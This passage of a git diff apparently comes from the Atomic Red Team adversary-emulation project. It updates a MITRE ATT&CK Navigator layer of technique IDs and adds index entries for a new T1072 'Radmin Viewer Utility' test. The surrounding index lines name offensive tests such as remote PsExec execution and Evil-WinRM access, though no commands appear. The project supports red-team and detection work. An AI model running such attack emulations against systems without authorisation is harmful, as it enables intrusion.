echniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{
"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"technique
ID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{
"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabl
ed":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"t
echniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":tru
e},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID"
:"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":tr
ue},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"tech
niqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled
":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","scor
e":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true
},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index b071737c..333ded94 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -800,6 +800,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
@@ -827,6 +828,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 8faf5fae..a91df23f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -575,6 +575,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt +execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell 
@@ -603,6 +604,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt +lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 376d32e7..19dec5dc 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1444,7 +1444,8 @@ - Atomic Test #1: Execute a Command as a Service [windows] - Atomic Test #2: Use PsExec to execute a command on a remote host [windows] - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) 
@@ -1499,7 +1500,8 @@ - T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 66cd7ded..ffb97ef0 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1049,7 +1049,8 @@ - Atomic Test #1: Execute a Command as a Service [windows] - Atomic Test #2: Use PsExec to execute a command on a remote host [windows] - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1072 Software Deployment Tools](../../T1072/T1072.md) + - Atomic Test #1: Radmin Viewer Utility [windows] - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - 